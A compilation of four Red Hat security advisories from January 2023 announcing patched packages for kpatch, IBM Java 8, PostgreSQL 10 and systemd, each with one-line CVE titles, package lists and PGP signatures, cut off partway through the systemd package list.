Red Hat Security Advisory 2023-0123-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0123-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0123  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2964 CVE-2022-4139   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

* kernel: i915: Incorrect GPU TLB flush can lead to random memory access  
(CVE-2022-4139)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.  
2147572 - CVE-2022-4139 kernel: i915: Incorrect GPU TLB flush can lead to random memory access

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kpatch-patch-4_18_0-425_3_1-1-2.el8.src.rpm

ppc64le:  
kpatch-patch-4_18_0-425_3_1-1-2.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-2.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-2.el8.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-425_3_1-1-2.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-2.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-2.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/cve/CVE-2022-4139  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i/NzjgjWX9erEAQjkhRAAobvxX9U+CJqUtMrpgkH9bKwP3tibH6Ct  
qKy1PFN2rQACX8MQcWg0rm7vhj9gxZr0hUwmFD4Df1Kw/Lb81mRanwRfR9WgEgyb  
DUIjUlxnYKbnR0dkAJkjlYeu9w+Mux9PVayF9xfe7Y/fu0nwpa9d4kgUlXVmgmGg  
oF5Xfg+UbzYwP/X8HCRyPlBds1PpN2n3ICTICC07d3ZuLWguS/r4EvqrGIjz3gPT  
qn9mUlMr1txrT24TXPY8ZkUK36v8vUkYKZrgkvCL4/ledXyGGnA03aCbvY16uGHV  
XBfoy0sd1nrdVzpWRLbgsiMpk5Rk4sby9wOrz4fo4vxW9vOAnta4bBUdMoPZOfTm  
bwsvD6TELncBIOdqTwqtwhNleulxwtcReNVYZ1SlbqcWrTDp3pgn+niYBO/arOQ7  
GgE+KqAOd/uoaa0IZZWIlStRJCNlvkb+2K/s+r/C89zPglmy4uBx2iMoDAkzjCGt  
zCYmHrIIFsblT6W5ekaww5zAgeH5/G47Mq+uVEJO1ZBJGG8vs12b1kvblx8Y8OBU  
kxSUjCFwff18i3lVMF/hYa/ff+CZxVLm077Dpymo+GTzqERhhd6jmplZAkJl7fyF  
WUxnHb7WgeGDyIlxe2/sjKenlZS421THK3LGqbGl2VZBTT4UJnGwBui2oj7YC+1F  
g5xbthsvB2w=  
=5lqj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0123-01

Red Hat Security Advisory 2023-0128-01 - IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 8 to version 8 SR7-FP20. Issues addressed include a randomization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-ibm security update  
Advisory ID:       RHSA-2023:0128-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0128  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-21619 CVE-2022-21624 CVE-2022-21626   
                   CVE-2022-21628   
=====================================================================

1. Summary:

An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Supplementary (v. 8) - ppc64le, s390x, x86_64

3. Description:

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM  
Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR7-FP20.

Security Fix(es):

* OpenJDK: excessive memory allocation in X.509 certificate parsing  
(Security, 8286533) (CVE-2022-21626)

* OpenJDK: HttpServer no connection count limit (Lightweight HTTP Server,  
8286918) (CVE-2022-21628)

* OpenJDK: improper handling of long NTLM client hostnames (Security,  
8286526) (CVE-2022-21619)

* OpenJDK: insufficient randomization of JNDI DNS port numbers (JNDI,  
8286910) (CVE-2022-21624)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of IBM Java must be restarted for this update to take  
effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2133745 - CVE-2022-21619 OpenJDK: improper handling of long NTLM client hostnames (Security, 8286526)  
2133753 - CVE-2022-21626 OpenJDK: excessive memory allocation in X.509 certificate parsing (Security, 8286533)  
2133765 - CVE-2022-21624 OpenJDK: insufficient randomization of JNDI DNS port numbers (JNDI, 8286910)  
2133769 - CVE-2022-21628 OpenJDK: HttpServer no connection count limit (Lightweight HTTP Server, 8286918)

6. Package List:

Red Hat Enterprise Linux Supplementary (v. 8):

ppc64le:  
java-1.8.0-ibm-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-demo-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-devel-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-headless-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-plugin-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-src-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-webstart-1.8.0.7.20-1.el8_7.ppc64le.rpm

s390x:  
java-1.8.0-ibm-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-demo-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-devel-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-headless-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-src-1.8.0.7.20-1.el8_7.s390x.rpm

x86_64:  
java-1.8.0-ibm-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-demo-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-devel-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-headless-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-plugin-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-src-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-webstart-1.8.0.7.20-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21619  
https://access.redhat.com/security/cve/CVE-2022-21624  
https://access.redhat.com/security/cve/CVE-2022-21626  
https://access.redhat.com/security/cve/CVE-2022-21628  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i+tzjgjWX9erEAQgXZhAAnPO4wozg4xq9yVOJ3Ena/VncnYPboIzf  
wV07vvXXaO4oYNyV0rTVYH6vM26ZMpG949nlcpXAtv3DKHyCpLXFS9qHmFseQ3nC  
PEPHuBZaT5LEU/v/tyaj24UYR/t2RnaLeycHKfzWhPhs6YChB5XuhQwQkAtJT7uE  
6VXj6JNSI58jLC1eFkQNoXs2W0k+TKw8ZmZUMcnCqmXTAyGUSlwxr2XGQTvPiKFY  
yL3b5+hOeuXIVdgsk+wdCGE4kelsB05fUtpVTxvDyrSxtYdHYRsQ33VuDTMJU81R  
Ib/KdMEBHX5T3PPuv0HZb3R82a97BBlKuYSTmaJzgBuP4JgynMe0JUU5eof4W2lG  
fQU8a9Gfx7BRO+Tp3npDsFNPuMAWU7Q8G90dmpYKo5neebpxJBvBYiHRySrZxEd2  
b6o7/DcT1Hc4jocrtrv6T4jYXerVM9f5f4JBGaE+NlBdWWw8B/ffeB81hBqgooKE  
yPxg1PmWrh2tyD3EEVNEa801EKT0uyh8HJd60M4Tltej81G/eUAlUjQc2RypZlIl  
j+uDjeBFVVHL8ESjhAgbCcL2LAhZa/VMRkh9wa5xGT8gCY3nJNhwOdtoUru6QbH4  
zJWVBXI24tj5MfdK6BGWtywTOLlm3XwOt9eZsnMvC7e/WuRYLNcRjvBTUnjZTgBo  
kEylWEHnWb4=  
=sUX9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0128-01

Red Hat Security Advisory 2023-0113-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:10 security update  
Advisory ID:       RHSA-2023:0113-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0113  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2625   
=====================================================================

1. Summary:

An update for the postgresql:10 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: Extension scripts replace objects not belonging to the  
extension. (CVE-2022-2625)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2113825 - CVE-2022-2625 postgresql: Extension scripts replace objects not belonging to the extension.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.src.rpm

aarch64:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm

ppc64le:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm

s390x:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm

x86_64:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2625  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i99zjgjWX9erEAQiXbA//WFJNDVuYD112PQg6wO+FY9ee3L4eDa7x  
XIuCvIpVe6MxugA85cM0/h6NyvsUM7PyZC0aH/QU2uN2yDVgYr39xLNexocHvxAR  
EFiJOZhK+24uBxc9bfm+jVNqtbVOjkzhScUwjNtP5W4QZbBxzgPPTb0Ybzd9ixvk  
GV8DifcjfX1edlBCqV78Hx1P1ISSMipKeTs5HtHsAZ4uK53anrdqZASe2yVy/FVr  
D/s1DeKfWh/AF/6w5JNWB+MWgsQzOnoXH25agzJAE91+uewLk1XWIm3ky7efSYny  
2QwuNCseR5IL1rdaSCgIZY1+khyc1qMk9MxRUs54bJzWi8OMJXvsN08I8gsngrxV  
Nf27NQfMx9KjIkMo/+cV93rWHzhsjzM0uNb1CrJvBNtr5xWfIsD4vTiSJIP91hpY  
hBqo8+1pI6Wo66dQkrLDrSo7gdmcLegE56GEAZtwEMPyraXcvb5qToM4OVW8kiVE  
4Kw7CGodi864kesB6ZCKPY7vr68/OjOkWhvbqtbQ1D9kz1UvzRMAAF0meP5fA//s  
PLidab430BWeGd1UagqkQVVBSZ+TTD+oOJwIb+dJBTYpZnEkIuNe4h7eHFW1PTLn  
dCR2CI6UsDUzMPS6bjklqaGEFxCLZpn2c7xzyKhcvOwmhEJEm0UWIAZZNk5ip4b0  
C67oezmmLbg=  
=GaKj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0113-01

Red Hat Security Advisory 2023-0100-01 - The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: systemd security and bug fix update  
Advisory ID:       RHSA-2023:0100-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0100  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-3821   
=====================================================================

1. Summary:

An update for systemd is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The systemd packages contain systemd, a system and service manager for  
Linux, compatible with the SysV and LSB init scripts. It provides  
aggressive parallelism capabilities, uses socket and D-Bus activation for  
starting services, offers on-demand starting of daemons, and keeps track of  
processes using Linux cgroups. In addition, it supports snapshotting and  
restoring of the system state, maintains mount and automount points, and  
implements an elaborate transactional dependency-based service control  
logic. It can also work as a drop-in replacement for sysvinit.

Security Fix(es):

* systemd: buffer overrun in format_timespan() function (CVE-2022-3821)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* ShutdownWatchdogSec value is not taken into account on reboot  
(BZ#2127170)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2127170 - ShutdownWatchdogSec value is not taken into account on reboot [rhel-8.7.0.z]  
2139327 - CVE-2022-3821 systemd: buffer overrun in format_timespan() function

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
systemd-239-68.el8_7.1.src.rpm

aarch64:  
systemd-239-68.el8_7.1.aarch64.rpm  
systemd-container-239-68.el8_7.1.aarch64.rpm  
systemd-container-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-debugsource-239-68.el8_7.1.aarch64.rpm  
systemd-devel-239-68.el8_7.1.aarch64.rpm  
systemd-journal-remote-239-68.el8_7.1.aarch64.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-libs-239-68.el8_7.1.aarch64.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-pam-239-68.el8_7.1.aarch64.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-tests-239-68.el8_7.1.aarch64.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-udev-239-68.el8_7.1.aarch64.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.aarch64.rpm

ppc64le:  
systemd-239-68.el8_7.1.ppc64le.rpm  
systemd-container-239-68.el8_7.1.ppc64le.rpm  
systemd-container-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-debugsource-239-68.el8_7.1.ppc64le.rpm  
systemd-devel-239-68.el8_7.1.ppc64le.rpm  
systemd-journal-remote-239-68.el8_7.1.ppc64le.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-libs-239-68.el8_7.1.ppc64le.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-pam-239-68.el8_7.1.ppc64le.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-tests-239-68.el8_7.1.ppc64le.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-udev-239-68.el8_7.1.ppc64le.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.ppc64le.rpm

s390x:  
systemd-239-68.el8_7.1.s390x.rpm  
systemd-container-239-68.el8_7.1.s390x.rpm  
systemd-container-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-debugsource-239-68.el8_7.1.s390x.rpm  
systemd-devel-239-68.el8_7.1.s390x.rpm  
systemd-journal-remote-239-68.el8_7.1.s390x.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-libs-239-68.el8_7.1.s390x.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-pam-239-68.el8_7.1.s390x.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-tests-239-68.el8_7.1.s390x.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-udev-239-68.el8_7.1.s390x.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.s390x.rpm

x86_64:  
systemd-239-68.el8_7.1.i686.rpm  
systemd-239-68.el8_7.1.x86_64.rpm  
systemd-container-239-68.el8_7.1.i686.rpm  
systemd-container-239-68.el8_7.1.x86_64.rpm  
systemd-container-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-container-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-debugsource-239-68.el8_7.1.i686.rpm  
systemd-debugsource-239-68.el8_7.1.x86_64.rpm  
systemd-devel-239-68.el8_7.1.i686.rpm  
systemd-devel-239-68.el8_7.1.x86_64.rpm  
systemd-journal-remote-239-68.el8_7.1.x86_64.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-libs-239-68.el8_7.1.i686.rpm  
systemd-libs-239-68.el8_7.1.x86_64.rpm  
